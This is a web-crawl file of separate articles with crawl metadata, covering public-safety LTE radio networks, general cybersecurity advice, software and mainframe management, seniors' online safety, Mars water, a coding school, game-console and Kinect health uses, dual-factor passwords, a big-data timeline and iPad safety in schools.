Representative Carlyle, in his blog, proposes that we deploy "Tetra" radios for public safety. While Tetra is common in some parts of the world, it is not used at all in the United States. This is a dangerous proposal, because it means Tetra networks we buy would not work with the equipment used by any other government or telecommunciations carrier anywhere in the United States. If called to respond to a diaster overseas, we could talk to firefighters in Hong Kong or the police in Ireland, however.
Another problem we face is the small market - the total market for public safety is perhaps 10,000,000 radios which are replaced, say, once every 10 years. On the other hand, the cell phone market is huge - 260 million cell phones replaced every two years in the United States alone. The economies of scale means consumers will have a lot more choice, and their cell phones will be relatively cheap.
So is there some way to reduce the sky-high cost of these dedicated public safety networks while at the same time not endangering cops, firefighters, EMTs and the public in general?
Absolutely. The FCC, in its national broadband plan, and the federal Department of Commerce, with its forward-thinking grant program for broadband, are lighting the way for a new public safety network which will be more robust, national in scope, and interoperable. By "interoperable" I mean the new public safety equipment will probably operate almost anywhere in the nation, wether on a dedicated government network or on a commercial cell phone network. Here are some features of the new networks:
- The FCC and major public safety organizations have called for the new public safety networks to be built using a fourth generation (4G) technology called LTE - long-term evolution. Not coincidently, this is the same technology which will be used by the major cell phone companies Verizon and AT&T when they construct their 4G networks. The commercial networks will operate on different frequencies than the public safety networks, but they will all be built in same general area of the wireless spectrum - the 700 megahertz (MHz) band.
- Because they are all using the same technology (LTE) and are in a similar slice of radio spectrum (700 MHz) potentially they will all interoperate. That means that public safety officers will use the government networks and frequencies when they are within range, but could "roam" to a commercial network if necessary. So cops and firefighters will have the best of both worlds - coverage from dedicated government networks and coverage from multiple private carriers. The FCC is even considering rules which would require the commercial companies to give public safety priority on the commercial LTE networks.
- Because everyone - consumers, cops, firefighters and even general government workers such as transporation and utilities - are all using LTE, constructing the networks can be much cheaper. Commercial telecommunications carriers could put government antennas and equipment at their cell sites, and vice-versa. Perhaps the network equipment at the cell site, or even the central switches could be shared as well. Public safety will still be using its own frequencies and have priority, but could share many other network elements.
- And the radios used by individual public safety officers or placed in police vehicles and fire trucks can be much cheaper as well. Because manufacturers are all making equipment for the same technology - LTE - it could cost just a few hundred dollars. Again, there will be specialized and ruggedized devices for firefighters and others working in punishing environments, but the "innards" - the electronics - will be much less expensive.
- Next, we have to get all first and second resopnders to use the same or common networks. Here in Washington State, for example, we have multiple overlapping and duplicate networks. City and County police and fire in the region have one network, each electric utility (e.g. Seattle City Light) have another network. Transportation departments have their own networks (e.g. Seattle Transportation and Washington State Transportation each have their own separate network). The Washington State Patrol has its own separate network. The State Department of Natural Resources has its own network. Fish and Wildlife has its own network. And federal government agencies (FBI, cutoms and immigration) have their own networks. This is patently stupid and expensive. As we build these new fourth generation LTE networks, we need to build a single network with lots of sites and a lot of redundancy and hardening to withstand disasters. And everyone - first and second responders from all agencies - should use it.
- Finally, and perhaps most importantly, all the networks will be nationally interoperable. The lack of communciations interoperability was a major finding of the Commission which investigated the September 11th World Trade Center attack. But with these new networks, a Seattle police officer's 4th generation LTE device will also work on New York City's LTE network or New Mexico's :LTE network or on any Verizon or AT&T network anywhere in the nation. As disasters happen anywhere in the United States, and first and second responders are rushed to the scene of the disaster, they can take their communications gear with them and it will work.
The City of Seattle is one of a handful (about 20) forward-thinking governments leading the way to deploy these new networks. Seattle's public safety LTE network, hopefully launched with a federal stimulus grant, will eventually expand throughout the Puget Sound region and across the State of Washington. The State of Oregon also has authority and a grant request to build an LTE network, and we are working with Oregon to make sure our networks work with each other seamlessly.
Is all of this a pipe dream? I don't think so. A number of public and private companies, governments and telecommunciations carriers and equipment manufacturers are working together to realize it. Many of them are in the Public Safety Alliance. In the Federal government, the FCC is working with the National Institute of Standards and the Departments of Commerce and Homeland security are providing grant funding. It will take a lot of work and many years to realize this network.
But when it is finished, we'll have public safety networks which work to keep us safe, and consumer networks which work to keep us productive and linked to our friends and families. These networks will be separate yet connected. They will be built from common technologies. And they will be less expensive for taxpayers than the networks we have today. | <urn:uuid:b16346b2-2973-40c0-9de2-fb71a7441682> | CC-MAIN-2017-04 | http://www.govtech.com/dc/blog/Why-Dont-Cops-Just-Use-Cell-Phones.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280791.35/warc/CC-MAIN-20170116095120-00526-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.961477 | 2,273 | 2.59375 | 3 |
Attacks against websites, databases and applications in recent years have made federal and public sector organizations inured to the typical everyday attack. Yes, these organizations are very much aware of today’s challenging security landscape and are taking appropriate actions to lessen the damage of attacks, but more can be done.
Today’s main security challenges include big data, cloud, mobility and mainframe issues -- and each presents potential issues for critical infrastructure and systems. Organizations often want to immediately “identify” where an attack originated, simply thinking that will solve the issue. However, the focus should remain on practical steps organizations can take to proactively reduce the risk of future attacks.
Risk mitigation does work in lowering the threat level, and is one of the recommendations to federal and public sector organizations as a basis for addressing the problem overall. Many agencies are applying these recommendations now, much like private enterprise, and organizations will see them increasingly taking a more risk-based approach.
The elements of a successful cybersecurity program are composed of some simple and direct actions. Here are five points that should be considered:
This one sounds simple enough, but in practice takes some degree of forethought. How to collect and, more importantly, how to correlate what you have collected are critical factors. Organizations should measure it all, but also really look at how data is being correlated, with apples to apples comparisons.
This came with a mantra of automate everything, then automate it again. Not only does collection have to be automated, but so does the monitoring. As humans, we cannot process the enormous amount of data generated in modern computing environments and recognize the events that should be correlated let alone alerted on.
Meaning that any vector is where the attack or vulnerability could come from. So be it social engineering, website drive-bys, spear phishing, or USB drop, to mobile, organizations have to have a means to discover it all.
Here organizations need to know what runs on the network, everyone that is on your network, and what devices are attached to the network. Also add, “know your incident response.”
Points one through three are the basics. This will prepare you against point four, and reduce the vulnerability surface available to attackers. These are the new basics for enterprise defense and acquiring incident response.
Ultimately, federal and public sector organizations have to wonder where they are in the cybersecurity lifecycle. What the industry has collectively learned is doing some basic items while working across the organization is foundational to good cybersecurity. Integrating these simple elements into a strategy is the basis for continuously diagnosing and mitigating networks – and using technology as an enabler to do so.
However, use the technology to automate correlation and draw conclusions that alert a human to a condition, who can then make a security response decision. It makes the difference from being drawn into an incident unprepared to knowing exactly how to execute the basics.
Image from Shutterstock. | <urn:uuid:25ead6e1-e54e-47f9-856e-85f3bed384f1> | CC-MAIN-2017-04 | http://www.govtech.com/security/Industry-Perspective-Protecting-Interconnected-Systems.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280791.35/warc/CC-MAIN-20170116095120-00526-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.961981 | 596 | 2.609375 | 3 |
Path is an environment variable that contains the path prefixes that certain applications, utilities, and functions uses to search for an executable file. The Path Configuration enables you to add path prefixes to this variable.
Provide a name and description for the Path Configuration
Specify the path to be added to the environment variables. Multiple paths can be specified separated by a semi-colon (;). Click the icon to select and assign a dynamic variable to the Path variable.
Using the Defining Targets procedure, define the targets for deploying the Path Configuration.
Click the Deploy button to deploy the defined Path Configuration in the targets defined. The configurations will take effect during the next system startup.
To save the configuration as draft, click Save as Draft. | <urn:uuid:b9153806-8973-450e-afe8-e2802ea446cd> | CC-MAIN-2017-04 | https://www.manageengine.com/products/desktop-central/help/computer_configuration/setting_path.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280791.35/warc/CC-MAIN-20170116095120-00526-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.803557 | 153 | 2.5625 | 3 |
The start of the mainframe heralded by the delivery of IBM(R) System/360 in April, 1964, enabled computing for business and government. As business back-office work was computerized, IT was asked to manage the systems and not just operate them. This meant having some way to find out what the systems were doing.
In 1967, Boole and Babbage (acquired by BMC in 1999) developed seminal programs, CUE (Computer Utilization Evaluator) and PPE
(Problem Program Evaluator) to report on how the resources in a computer were being used. Not only did these software tools answer the immediate need for IT, they spawned systems management solutions that would continue to be invented and enhanced over the ensuing five decades of the mainframe.
BMC Innovations that Changed Mainframe Management (1964 – 1970)
(Watch this blog in coming weeks for reminiscences about these innovations.)
1967 – PPE
was the first tool to give IT visibility into how programs were executing and
using CPU resources.
1967 – CUE
was the first tool to give IT visibility into how devices were being accessed
You can also view a fifty year timeline and more information on our mainframe anniversary page at www.bmc.com/mainframeanniversary
(R) Trademarks or registered trademarks of International Business Machines Corporation in the United States, in other countries, or both. | <urn:uuid:b9bcf59a-47ac-4690-8e4e-7bf1d613bcf6> | CC-MAIN-2017-04 | http://www.bmc.com/blogs/50-bmc-mainframe-innovations-system360-period1964-1970/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00250-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.945893 | 294 | 3.171875 | 3 |
The Australian Human Rights Commission has called on the federal government to adopt the Joint Select Committee’s Cyber Safety for Seniors report recommendations, saying that this will help senior citizens to stay safe online while increasing access to services.
The report, entitled A Worthwhile Journey, was presented to the Parliament speaker on 16 April, 2013.
It includes a number of recommendations such as publicising the Broadband for Seniors kiosks. More than 2000 computer kiosks are located around Australia offering free Internet access and training for seniors. The initiative also aims to build social inclusion among senior citizens who, according to the report, sometimes face isolation.
In addition, the report recommended that a telephone hotline be created for those who were not confident in using Web-based information. A Broadband for Seniors website – which includes cyber safety tips – was developed in early 2013.
According to Age Discrimination Commissioner Susan Ryan, eight of the report’s 13 recommendations draw from the Commission’s submissions.
“One of the most important recommendations we made was in relation to researching fraud victimization of older people. I am pleased to see that the report recognises older people can be the targets of cybercriminals because they have substantial assets and may be less savvy technology users,” she said in a statement.
“The Committee’s recommendations about the need to teach older users how to protect themselves from cyber fraud, and to make reporting cybercrime online easier for them, are extremely important.”
If the cyber safety recommendations are adopted, Ryan said she expected more people aged over 65 would “feel confident” enough to gain computer skills and go online to access information and services they need.
Follow Hamish Barwick on Twitter: @HamishBarwick | <urn:uuid:46ac8a9b-3bb3-480b-a2a1-c72049e733bd> | CC-MAIN-2017-04 | http://www.computerworld.com.au/article/461120/senior_citizens_need_cyber_safety_protection_human_rights_commission/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00306-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953187 | 361 | 2.515625 | 3 |
NASA scientists have long chanted a mantra about Mars: follow the water, follow the water. So, we sent a lander to the northern latitudes looking for extant ice. More recently, the Mars Curiosity rover has been exploring planetary features that seem created by long-ago water flows, at least if Martian geology is as familiar as we think it is.
But what about water now? Flowing water.
Georgia Tech scientists working with the Mars Reconnaissance Orbiter spotted some seasonal darkening along some slopes during warm weather. In the image below, the lines move from right to left down the slope of the Newton crater. They're called "recurring slope lineae."
It looks, to eyes on Earth, like some kind of water flow.
"We still don't have a smoking gun for existence of water in RSL, although we're not sure how this process would take place without water," the graduate student who discovered the RSL, Lujendra Ojha, said in a NASA release.
But temperatures on Mars are too cold for regular old H2O. The water would have to have some kind of natural anti-freeze in it. And that's what Ojha and Georgia Tech professor James Wray went looking for in new studies.
They found that iron concentrations increase in RSL regions as the lines get darker and longer. The scientists hypothesize that it's some kind of iron-based antifreeze flowing in the water, perhaps, they suggest, ferric sulfate.
In any case, these recent studies don't conclusively prove whether there is flowing water on Mars, nor do they begin to answer the big question: could this water support some sort of life? After all, it is the necessity of water for life as we know it that makes scouring Mars for water NASA's reasonable MO.
But it does make for an exciting time for Martian researchers: flowing water on Mars would be a very big deal. | <urn:uuid:c9c66d4c-5a0c-483c-8d23-f201175aec64> | CC-MAIN-2017-04 | http://www.nextgov.com/emerging-tech/2014/02/gif-shows-what-might-be-water-flowing-mars/78569/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00214-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.967587 | 402 | 3.765625 | 4 |
Computer viruses and other malware such as worms, trojans and spyware, are rife and can cause tremendous damage to systems that become infected. Because of this, anti-virus (AV) technology is one of the most commonly deployed security controls used by the vast majority of computer users, from individuals to large organisations. According to the 2009 CSI Computer Crime and Security Survey, more than 99% of respondents have AV technology deployed.
Having been on the market for some years, there are a wide variety of choices of AV technology, from standalone tools to AV bundled into security suites that integrate a variety of other security controls. Many standalone tools are offered for free and provide just basic protection. According to OPSWAT Inc, in its Worldwide AV Market Share Report of June 2010, free AV tools account for 42% of the total market share.
Even with the use of AV technology being so widespread, malware infections were cited as the worst security incident faced by respondents to the CSI survey and are growing in number and complexity. This is echoed in the Information Security Breaches Survey 2010 commissioned, by Infosecurity Europe, which found that 62% of large organisations surveyed had been infected with malware in the previous year, up from 21% three years previously, and 43% of small organisations, up three-fold over three years. Overall, malware infections were the cause of the worst security incident faced by organisations of all sizes over the previous year.
Such malware attacks are growing fast in sophistication and complexity, often using variants of known exploits that aim to get around defences that have been put in place. In mid-2010, technology vendor McAfee released research showing that 10 million malware samples had been entered into its database during the first half of 2010 alone, the majority of which are variants of known families of malware. For example, it states that it is not uncommon to see more than 10,000 variants of the Koobface worm, which looks to harvest information from users of social networking sites, in a single month. The complexity of new malware can be seen in the case of the Conficker worm, which combines the use of a number of advanced malware techniques to make it harder to eradicate it. Often introduced into computer networks via infected removable media, the worm blocks access to anti-malware websites, disables automatic updates that could include a patch against it and kills any anti-malware protection installed on the device. Its authors are also known to test Conficker against anti-malware defences commercially available to ensure that it can defeat them.
Factors such as these mean that traditional AV protection, based on signatures identifying and patching known threats, provide little defence. This leaves users in an endless cycle of updating their AV software with patches as they are released and cleaning up infections that have occurred, which often requires support from the AV technology vendor. And here is the rub. Very few free AV products include any kind of support from the vendor and the cost of support can add a hefty price tag. Plus, only some products provide protection based on detecting patterns of behaviour that can be used to identify unknown threats, leaving users with huge gaps in protection.
Many traditional standalone AV products--both free and paid-for versions--are also ineffective against new sophisticated threats that are often highly targeted and use a range of blended mechanisms to make their payload more successful. For example, a user may be sent a personalised phishing email that urges them to click on a link that takes them to a website infected with malware. Many standalone AV products provide no defence against such attacks as they do not include controls for protecting users from websites infected with malware or provide proactive protection against phishing attacks.
Anyone relying on legacy, standalone, signature-based AV controls is putting themselves at risk of being the victim of an attack that could cost them dearly. This goes beyond the costs of clearing up after an attack and the time and cost involved with patching devices or purchasing updated versions of the software. Javelin Strategy & Research estimates that more than nine million Americans have had their identities stolen through their personal details being harvested from internet applications or other means.
According to the UK Home Office, identity theft costs the UK economy £1.2 billion per year.
That does not mean to say that computer users should not deploy AV controls. Rather, AV and other anti-malware technologies should be one component of a layered security defence, along with a host of other tools and services. These include a firewall and intrusion prevention capabilities, web filtering and blocking, email, phishing and spam protection, and, for consumers, parental control functionality. These security controls should be integrated and should be managed through one central console or interface, in the case where the products are administered and managed for the user by a hosted service provider. For true, proactive protection against all threats affecting computer users, the provider should offer proactive threat intelligence services to identify previously unknown threats as they are encountered.
For any computer user--home users, small businesses or large organisations--the cost of the technology is a prime concern, especially as budgets are under pressure. But those costs need to be weighed against both the burden of maintaining legacy AV controls, including upgrading and vendor support costs, and the dangers of not having their systems adequately protected. The costs of remediating a security incident can far outstrip those of upgrading to better protection.
For many small businesses and consumers, a cultural change is required. The survey referenced above from Infosecurity shows that 83% of small organisations with less than 50 employees had experienced a security incident during 2009—up from 45% the year before. And the average cost of clearing up after an incident for such organisations ranged from £27,500 to £55,000. Clearly it is not just large organisations that are being victimised.
The key to lowering such costs is to purchase multi-tier protection. Rather than thinking that it is sufficient to place security controls to guard the perimeter of the organisation, the cultural change that is needed is to start thinking of security in terms of the assets that need to be protected--sensitive personal information and intellectual property and the like that can be used for financial gain.
Organisations of any size, and consumers alike, should look to gain an understanding of what impact the loss or compromise of such assets would be on their business or their personal life. Then they will be in a position to decide what controls need to be put in place to protect those assets from the whole gamut of threats facing computer users today. There are many hidden costs in anything that appears to be free or low cost and, in business, a bargain is rarely as good as it sounds. | <urn:uuid:bdba921b-52dd-4c27-b003-1c7ee7d678e5> | CC-MAIN-2017-04 | https://www.bloorresearch.com/blog/security-blog/anti-virus-alone-is-a-poor-strategy/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00122-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.963342 | 1,348 | 3.21875 | 3 |
Dual passwords can keep phishers at bay
- By John Breeden II
- Dec 10, 2012
After South Carolina’s Department of Revenue was hacked in November, exposing 3.8 million Social Security numbers, 387,000 credit and debit card numbers and 657,000 business tax filings, state officials announced plans to implement a dual-authentication password system to better protect information.
What the state had at the time of the attack offered next to no security: a single-password security system, with almost none of the data encrypted.
A simple phishing attack gained access to one employee’s user name and password, and the hackers were off to the races, allegedly accessing the financial system at will for well over a month before the hack was discovered, according to The State newspaper.
Federal agencies have two-factor authentication, the second factor in the form of a token such as a Personal Identity Verification card (civilian agencies) or Common Access Card (defense). But public-sector agencies without that kind of protection could turn to dual password systems.
There are two main dual-authentication password systems in use today, outside of biometrics.
The method frequently used by banks, online games and any site with high-value transactions is called one-time password. It’s almost always used as a second line of defense behind the usual name and password protection. The key is that the second password changes very often, sometimes as quickly as every minute, but certainly no less than every 90 seconds. A security server uses a mathematical algorithm to keep changing the password. Of course, users need to know that changing password, and this information is given to them via a portable device that can both keep track of time and has the same mathematical formula as the server. So the mobile device and the security server come up with the same numbers at the same time.
For a user to get access to a protected system, he has to enter the right password at the right time. Some fancy password systems include a USB key or a smart card as part of the mobile device, and a user has to insert the token into a system he is using to access the data, whereby the password is automatically applied.
If the password on the token matches the current one on the security server, access is granted. This makes it almost phishing-proof because even if a user somehow gives out the second password, it’s only valid for a very short time. And in the case of the automatic passwords, a user probably never actually knows what the rotating passwords are. He just inserts his key to gain access. A phisher or hacker who gains the primary password doesn’t get into the system, and attempts to break the second password after the first is approved will trigger alarm bells in any halfway decent monitoring setup.
The second method involves encrypting all files and folders with a program such as BitLocker, in which encryption acts like the second password. If a hacker is able to access a system, say, by using a phishing attack, he still doesn’t get anywhere. All the files will be encrypted gibberish.
The value of this system is that even if someone steals all of the files, he likely won’t be able to make use of them because of the encryption protecting the data. It also makes data monitoring systems more effective because they can detect if someone accesses a system properly, but then runs into walls each time he tries to use a file.
In truth, a system like the one in South Carolina that protects Social Security information and tax records can never be too protected. It should probably have both secondary password methods in use, for a triple-security login, plus system monitoring. But either of the two methods alone would have stopped the rather unsophisticated attack on the South Carolina system had it been in place at the time of the breach. The state just made it easy for the hacker, and provided a valuable lesson in what not to do.
John Breeden II is a freelance technology writer for GCN. | <urn:uuid:4eac7558-0d64-4731-bc41-f3f7a6180cb9> | CC-MAIN-2017-04 | https://gcn.com/articles/2012/12/10/dual-authentication-passwords-south-carolina-hack.aspx?admgarea=JR_CYBER | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280850.30/warc/CC-MAIN-20170116095120-00058-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.949763 | 833 | 2.53125 | 3 |
The U.S. and U.K. track phone calls and Internet usage extensively
The first revelation from the Snowden files came on June 5, 2013, courtesy of the Guardian newspaper. That initial story revealed how extensively the NSA tracked phone calls, even of U.S. citizens -- contradicting the NSA's earlier statements to Congress that only noncitizens were targeted. Later, it was revealed that the NSA relied on spy agencies such as Britain's GCHQ to spy on Americans on its behalf where the law prevented the NSA from doing so directly.
Several federal judges called the NSA program unconstitutional, President Barack Obama ultimately called for its scope to be reduced, and the U.S. House of Representative passed a bill limiting NSA phone tracking, though the Senate has not yet acted.
At the Guardian: The NSA files | <urn:uuid:e557256b-9e13-4db4-bf74-c7fa057b5b90> | CC-MAIN-2017-04 | http://www.cio.com/article/2369294/security0/155647-There-are-no-secrets-Edward-Snowdens-big-revelations.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00388-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.955957 | 165 | 2.53125 | 3 |
French Coding School in U.S. to Offer New ApproachBy Samuel Greengard | Posted 2016-08-02 Email Print
A French tech school brings unconventional learning methods to the U.S. This type of peer-to-peer, project-based approach may represent the future of learning.
Finding highly qualified coders is a huge and growing challenge. According to various industry statistics, deficits now extend into the hundreds of thousands globally, and the shortage is expected to worsen in the years ahead.
One organization taking aim at the challenge is Ecole 42, a private French coding school that flips the concept of learning upside down. Tuition is free, there is no formal curriculum or school hours, and textbooks and instructors do not exist.
Students embark on a self-paced program that leads to graduation anywhere from 12 months to five years in the future. They can even take time off to volunteer or travel. Along the way, students must navigate an array of challenges that lead to advanced thinking about coding and software development.
"We teach students how to work together to solve problems," says co-founder and president Nicolas Sadirac.
The mastermind of this concept is French billionaire, Xavier Niel, founder and majority shareholder for French ISP and telecom Iliad, which operates under the brand name Free. In 2013, he provided 70 million Euros to create Ecole 42, a reference to Douglas Adams' book The Hitchhiker's Guide to the Galaxy, which posits that the number 42 represents the meaning of life and the universe.
The school has about 2,500 students. Every year, around 80,000 students take a tough online test, and 3,000 are invited to a one-month piscine, which translates to swimming pool in French. The name is significant because students essentially sink or swim, and about 1,000 gain admission to the school.
Incredibly, more than 40 percent of the school's students did not finish high school, and 30 percent have no previous coding experience. Many also couldn't afford to go to school without this program.
Small Groups Tackle Coding Challenges
Once accepted, the students work in small groups and tackle coding challenges that span areas such as mobile, augmented reality (AR), virtual reality (VR), artificial intelligence (AI), cyber-security and robotics. The school's software analyzes how well they work in groups, how much knowledge they share and what progress they make.
Sharing isn't cheating; it's part of an essential collaboration process. Gamification methods lead students to Level 21 (half of 42), at which point they graduate. "Already, the school boasts about 2,000 graduates working at 70 companies, including many top Silicon Valley firms.
Now this concept is coming to America. In November, a 200,000-square-foot campus will open in Fremont, Calif., joining the Paris facility. Niel has committed another 100 million Euros for funding the U.S. campus over a 10-year span.
Offering free tuition for all students, 42 USA is expected to add 10,000 students over the next five years. It will use the same peer-to-peer learning methods as the Paris school.
"If you teach a specific coding language, it will probably be obsolete in a few years," Sadirac points out. "If you teach people how to think in a broader and more creative framework, they can adapt and adjust and do some amazing things."
A bevy of high-tech leaders have endorsed the concept. The list includes Twitter CEO and Co-founder Jack Dorsey, Nest Founder and CEO Tony Fadell, Snapchat Co-founder and CEO Evan Spiegal, and former PayPal President and current Facebook Vice President David Marcus.
Niel emphasizes that "the goal is to give back. We want to create the best coding school in the world. This approach does not work for all students, and it is not right for every situation … but we believe that it can shape the future of learning." | <urn:uuid:e305e9f2-2552-4a1c-9fa5-e32d9933e26a> | CC-MAIN-2017-04 | http://www.baselinemag.com/careers/french-coding-school-offers-new-learning-approach.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00140-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954079 | 821 | 2.515625 | 3 |
Victims of heart attacks could have their recovery process sped up with the help of Nintendo's Wii console, doctors in the US have found.
Boffins - who no doubt spent their entire research grant on games consoles rather than test tubes - discovered that playing the Wii can help rewire brain-to-muscle coordination. Unlike most computer games, players of the Nintendo Wii must mimic the physical movements involved in a game, providing a fun, low-impact way to regain coordination.
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers.
With the processing power of the Playstation 3 being used for medical research, it seems that buying a games console is no longer a frivolous expense it is a moral - or should that be medical - imperative. | <urn:uuid:51963b7f-d7d5-4b9f-be17-4074a03a3fd9> | CC-MAIN-2017-04 | http://www.computerweekly.com/news/2240083474/Heart-attacks-now-with-free-games-console | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00048-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954868 | 166 | 2.765625 | 3 |
Kinect hacks are a dime a dozen these days, but this one has a health-care twist. A hacker named Benjamin Blundell is using a Kinect, a set of VR goggles, and some gyroscopes to help treat patients effected by phantom limb syndrome.
Phantom limb patients are often treated using a mirror box. The idea is to use a reflection of the remaining limb to fool the brain into thinking that the amputated limb is still there. This allows patients to "move" the phantom limb and "unclench" it from imagined painful positions. Ben's method works on a similar principle, but he decided to use a decidedly more high-tech method.
As laid out in his video explaining the project, Blundell's high-tech method has some advantages over the traditional treatment. Instead of simulating the missing limb with a mirror, Blundell's method puts patients into a virtual room where, using the Kinect and the VR goggles, patients can interact with the environment using an entire virtual body onscreen.
Just like in the traditional system, the Kinect treatment can mirror the patient's limb movement, but sensors attached to the amputated arm also allow for some measure of independent control. This will hopefully create a more natural illusion for the mind and make for more intuitive treatment.
The new system hasn't gone through extensive medical testing yet, so it's too early to call the method a complete success. But anecdotally, Blundell's first test subject reported a significant decrease in pain. The project, and paper, have been accepted to the GRAPP conference on computer graphics, so hopefully we'll hear more about this treatment in the near future.
Like this? You might also enjoy...
- CyanogenMod 7 Root Gives Nook Tablet Extra Functionality
- This Video Shows How Computers See the World
- 3D Printers Now Print Human Body Parts
This story, "Kinect hack helps treat phantom limb syndrome" was originally published by PCWorld. | <urn:uuid:7549e80c-7b20-4158-a8bc-3316892f7888> | CC-MAIN-2017-04 | http://www.itworld.com/article/2732231/consumerization/kinect-hack-helps-treat-phantom-limb-syndrome.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280310.48/warc/CC-MAIN-20170116095120-00352-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.934828 | 407 | 2.59375 | 3 |
Tracking the evolution of big data: A timeline
Big data has been the buzz in public-sector circles for just a few years now, but its roots run deep. Here’s a look at key events over the past 30 years that have affected the way data is collected, managed and analyzed, and help explain why big data is such a big deal today.
IBM releases DB2, its latest relational database management system using structure query language (both developed in the 1970s) that would become a mainstay in government.
Object-oriented programming (OOP) languages, such as Eiffel, start to catch on. Although OOP dates to the 1960s, it would over the next decade become the dominant programming language.
Archie, the first tool used for searching on the Internet, is created.
The World Wide Web, using HyperText Transfer Protocol (HTTP) and the HyperText Markup Language (HTML), appears as a publicly available service for sharing information.
Gopher, a TCP/IP application layer protocol for distributing, searching and retrieving documents over the Internet, is released as an alternative to the early World Wide Web. Gopher’s rise leads to two new search programs, Veronica and Jughead.
The W3Catalog, the World Wide Web's first primitive search engine, is released.
Sun releases the Java platform, with the Java language first invented in 1991. It would become one of the most widely used languages in government, particularly in Web applications that will increasingly replace face-to-face and paper transactions.
The Global Positioning System, in the works since 1972, achieves full operational capability.
Michael Cox and David Ellsworth of NASA’s Ames Research Center publish a paper on visualization which they discuss the challenges of working with data sets too large for the computing resources at hand. “We call this the problem of big data,” they write, possibly coining the term in its current context.
Carlo Strozzi develops an open-source relational database and calls it NoSQL. A decade later, a movement to develop NoSQL databases to work with large, unstructured data sets gains momentum.
Google is founded.
Tim Berners-Lee, inventor of the World Wide Web, coins the term “Semantic Web,” a “dream” for machine-to-machine interactions in which computers “become capable of analyzing all the data on the Web.”
Wikipedia is launched.
In wake of the Sept. 11, 2001, attacks, DARPA begins work on its Total Information Awareness System, combining biometrics, language processing, predictive modeling and database technologies in one of many new data-gathering and analysis efforts by agencies.
The amount of digital information created by computers and other data systems in this one year surpasses the amount of information created in all of human history prior to 2003, according to IDC and EMC studies.
Apache Hadoop, destined to become a foundation of government big data efforts, is created.
The National Science Board recommends that NSF create a career path for “a sufficient number of high-quality data scientists” to mange the growing collection of digital information.
The number of devices connected to the Internet exceeds the world’s population.
IBM's Watson scans and analyzes 4 terabytes (200 million pages) of data in seconds to defeat two human players on “Jeopardy!”
Work begins in UnQL, a query language for NoSQL databases.
The Obama administration announces the Big Data Research and Development Initiative, consisting of 84 programs in six departments. The National Science Foundation publishes “Core Techniques and Technologies for Advancing Big Data Science & Engineering.”
IDC and EMC estimate that 2.8 zettabytes of data will be created in 2012 but that only 3 percent of what could be useable for big data is tagged and less is analyzed. The report predicts that the digital world will by 2020 hold 40 zettabytes, 57 times the number of grains of sand of all the beaches in the world.
Connect with the GCN staff on Twitter @GCNtech. | <urn:uuid:aa9505e4-d4c2-46ac-88f8-a66e8f044ca2> | CC-MAIN-2017-04 | https://gcn.com/articles/2013/05/30/gcn30-timeline-big-data.aspx?admgarea=TC_BigData | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00076-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.901524 | 863 | 3.328125 | 3 |
Keeping children safe while using their iPad is extremely important for schools, teachers, and parents. The concepts of ensuring children are protected while online is often referred to as eSafety.
Three important aspects of eSafety relating to iPad use include:
- Student privacy – protecting access
- Educational environment – fostering personalized learning
- Digital citizenship – providing opportunity for growth
Student privacy: Protect access
Student data privacy is a common concern among school administration. Placing passcodes on devices is one way to help ensure a student’s personal email, social media accounts, and applications are protected. And as passcodes are put on devices, inevitably, students will forget them.
This is the main reason some schools avoid passcodes. They believe there is the potential for lost instructional time and additional strain on IT to reset passcodes when students forget. With tools in the teacher’s hands to remotely unlock and clear a passcode on an iPad, lost instructional time can be minimized and access protected — all without IT assistance.
Educational environment: Personalize learning
To get the most out of classroom time, teachers need to personalize learning and foster students’ engagement. The best way to do this is to allow them the freedom to work on projects that they enjoy, while still driving learning forward.
Teaching in this environment can be a change and an adjustment for many teachers. One resource to support this change is Casper Focus. As students are actively engaged, teachers can draw their attention back as necessary by using a new Casper Focus feature that allows them to send a customized message to each student’s iPad. This temporarily pauses what the student is working on and allows the teacher to provide instruction.
Digital citizenship: Opportunity for growth
To offer a sense of personal ownership and responsibility, IT staffs can provide access to certain apps and webpages to individuals or groups based on grade, ability, or maturity level. Students can earn their way into accessing more content on their device. Not all devices will be the same and access can be based off of digital citizenship level. This promotes higher levels of digital citizenship so that students can do more things on their iPad (like the things that their friends may have access to.)
